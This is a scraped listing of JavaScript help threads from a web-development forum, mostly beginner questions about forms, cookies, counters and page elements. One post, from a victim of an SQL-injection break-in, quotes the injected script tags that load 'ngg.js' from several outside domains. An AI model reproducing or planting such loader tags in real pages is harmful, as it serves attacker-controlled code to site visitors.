15,127 Topics

Member Avatar for
Member Avatar for geekpie

Scribblelive is a live blogging app based on Ajax allow anyone logged in to write to the same blog. The blog is updated with other people's contributions without you taking any action. In layman's terms, is such an app based on a Javascript loop (using the Ajax objects) which checks …

0
55
Member Avatar for greeny_1984

I [code] function numvalues() { if((window.event.keyCode>57)||(window.event.keyCode<48)) { alert("Only Digits Are Allowed"); window.event.keyCode=null; } } [/code]

Member Avatar for Troy III
0
137
Member Avatar for Savion89

Hey guys, gonna need some help with this sudoku coding. simply doing for quite sometimes but it doesnt seems working in my html. im using the x & y random number. any comment on this ?

Member Avatar for Savion89
0
93
Member Avatar for kjomyjose

Four times my MSSQL Server hacked. Somebody inserts most of the tables text, varchar fields with its value adding at the end with<script src=http://www.pyttco.com/ngg.js></script> I changed my ftp usernamd and password, database username and password. Still they are able to insert different scripts like <script src=http://www.cdport.eu/ngg.js></script> <script src=http://www.drvadw.com/ngg.js></script> <script src=http://www.bnrc.ru/ngg.js></script> …

Member Avatar for peter_budo
0
77
Member Avatar for MortiS

Hello! I cant figure out, how can i accomplish the following: i need to show a close button over an image when mouse is hovering over it. Clicking this button will delete the image. The problem, ofcourse, is not the image deletion, but how to show a close button in …

Member Avatar for Troy III
0
164
Member Avatar for lydia21

can u please tell me how to download fckeditor with skin-office 2003 ie.[url]http://www.fckeditor.net/demo/skins?skin=office2003[/url]

Member Avatar for R0bb0b
0
111
Member Avatar for airwinx

Hi All, I have 3 horizontal tabs menus with different form to let user key in some infor to the text fields. When user 1st time access this page, all fields are blank. But if user want to go to the second tab, user must key in some infor at …

Member Avatar for Troy III
0
103
Member Avatar for lydia21

hi, please tell me how to download tinymce editor . i want to download the below tinymce editor [url]http://tinymce.moxiecode.com/example_full.php[/url]

Member Avatar for nav33n
0
296
Member Avatar for DrWhoFan

When I started to formally learn web programming, determining what browser was being used was a very complicated process as standards hadn't started being established. Most of the methods of doing this were based upon filtering the navigator.userAgent. (which is probably why even server-side languages gives you access to this …

Member Avatar for DrWhoFan
0
96
Member Avatar for Bon0305

Javascript code: [code=javascript] function showVideo(){ document.getElementById("video_popup").style.visibility="visible"; obj = document.getElementById("video_popup"); if (obj.style.display == "none") { obj.style.display = ""; } } function hideVideo(){ document.getElementById("video_popup").style.visibility="hidden"; obj = document.getElementById("video_popup"); if (obj.style.display == ""){ obj.style.display = "none"; } } [/code] .......................... Open and close divs>>>> <a href="javascript:showVideo();">Watch the Video</a> <p id="closebutton"><a href="javascript:hideVideo();">Close Window</a></p>

Member Avatar for Ezzaral
0
57
Member Avatar for yenyen

hie.... my question is that i have to let the user to input chinese characters from the text box through ajax request and then save in database. when i trying to save the data into database, it save all the chinese characters in a series of question marks(??????). this thing …

Member Avatar for ~s.o.s~
0
87
Member Avatar for jakesee

Hi, I have a table in a form like this [CODE] <form> <table> <tbody id='target'> <tr id="dolly"><td><input name="hobby[0]" /></td></tr> </tbody> </table> </form> [/CODE] I also have a button to add a new row, by cloning the 'dolly' tr and appending to 'target' [CODE] <input type="button" onclick="AddRow('dolly', 'target') /> [/CODE] May …

Member Avatar for jakesee
0
5K
Member Avatar for cogzkev

I'm started using javascript resently and would like a pdf document on it where do i get it

Member Avatar for Shanti C
0
59
Member Avatar for Shanti C

Hello all... please help me to solve this thread very urgently??? How to rotate an image by 360 degrees in javascript or any other technology??? What requirements need to complete this task??? see this link for refernce: [url]http://www.i-spy360.com/en/ispyspin/[/url] Thanks...

Member Avatar for Shanti C
0
108
Member Avatar for davonz

Hi I have spent 2 days struggling to get a veriable to be assigned to "City" and then added as a veriable pasted to the function getDealer. "data" is an array filled with cities names and I index the array by using the veriable "count" I am adding a row …

Member Avatar for davonz
0
176
Member Avatar for crazy.works

hello, i have a small hard question , i really wish to find the answer soon here because iam look for that answer for 3 days and i got no success , well , iam not a professional in the php programming but iam trying to be good as i …

Member Avatar for crazy.works
0
125
Member Avatar for jonpfl

All, I hope I can explain this right. We have a web application we are working (ASP) and we want the ability to create PDFs for the user. These PDFs can take up to 2 or 3 mins to create and we do not want to tie up the user …

Member Avatar for jonpfl
0
139
Member Avatar for Oreo1982

hey folks, I've got a problem. I created a function that creates a javascript alert. it works fine for the invalid date call, but not for the updated call. I have used this function on several other projects and have had no problems with it until now. If stepped through …

Member Avatar for Oreo1982
0
124
Member Avatar for mike_22cool
Member Avatar for Madawa

hi, i'm new to JS. i'm having a problem with my jscript. i'm using innerHTML to insert rows to table dynamicaly.. but when i do this ..... [B][I]for example: i have added a row and i filled it with data(e.g text box) and then i add a another row when …

Member Avatar for Madawa
0
94
Member Avatar for awaida

i want to make a login window that should be opened in the same window . this window opener must be disabled. please can any one help me to resolve this problem thank you so much

Member Avatar for awaida
0
93
Member Avatar for anuj_sharma

hey guys... last nite i made a calculator using javascript...the only prob m having is that m not able to make memory in the calculator. memory means MR,MS MS-->is used to store the displayed no MR-->recall the stored no PLEASE HELP

Member Avatar for R0bb0b
0
81
Member Avatar for GooberKing

Hey folks, I've got a real head-scratcher here. Below is a simple, quick script I've written that defines an object that contains an array plus an ID property. I then create a nested chain of objects by storing each child in the parent's array, like so: [CODE] function TestObj() { …

Member Avatar for ~s.o.s~
0
86
Member Avatar for iSoftware

Hi, I have a HTML page with a form in it. I need to pass a parameter to my Visual Basic application if the signup was successful. My HTML form is simple: [CODE=HTML] <form action="signup.php" method="post" name="signup" onSubmit="return signup();"> <!-- Some text boxes and check boxes --> </form> [/CODE] On …

0
63
Member Avatar for kishor_agrawal

I trying [icode]Window.unload=setcookie(username,'xyz',365);[/icode] where [code=JavaScript]function setCookie(c_name,value,expiredays) { var exdate=new Date() exdate.setDate(exdate.getDate()+expiredays) document.cookie=c_name+ "=" +escape(value)+ ((expiredays==null) ? "" : "; expires="+exdate.toGMTString()) }[/code] not working....... can anybody help me?

Member Avatar for R0bb0b
0
115
Member Avatar for adaykin

Hello, I want to be able to echo a redirect url, based on a few variables. The content type of this php script is set as Header("content-type: application/x-javascript"); here is my code: [CODE] $row = mysql_fetch_row($result); echo "window.location = \"http://myurl.com/test/".$row[0]."/index.php?name=".$row[0]."\";"; [/CODE] Right now the url just outputs the url as …

Member Avatar for digital-ether
0
132
Member Avatar for vit0

Hello People! Hope, you solve my problem. I program in VB.NET and have a WebForm that contain a client Javascript counter (min:sec) to zero. I use this code to show up a counter. [CODE]<script language="javascript"> var up,down; var min1,sec1; var cmin1,csec1,cmin2,csec2; function Minutes(data) { for(var i=0;i<data.length;i++) if(data.substring(i,i+1)==":") break; return(data.substring(0,i)); } …

Member Avatar for ~s.o.s~
0
144
Member Avatar for Keased

HI i would be more than thankful if anybody can tell me why this don't work, the problem is that the JS counter won't work when there are more then 1 entrys in mysql. With one entry the script runs fine. Heres the code: [code] <table> <? //Connect to mysql …

Member Avatar for ~s.o.s~
0
81
Member Avatar for akshit

hi guys. i require some assistance of yours again. what i want is this: there is a form (say on page xyz.php) in which i have , say, 5 text-fields. but i also hav a button. upon clicking whihc, i want another text-field to appear. i do now want to …

Member Avatar for Shanti C
0
106
Member Avatar for rejisha

i have two text boxes with the id as first and second respectively.In javascript i took the values using [code] var first=document.getElementbyId("first").value. var second=document.getElementbyId("second").value. var sum=first+second; [/code] But the problem is when i alert the sum i got the result as concatenated.i didn't get the original sum.I also tried it …

Member Avatar for ~s.o.s~
0
155

The End.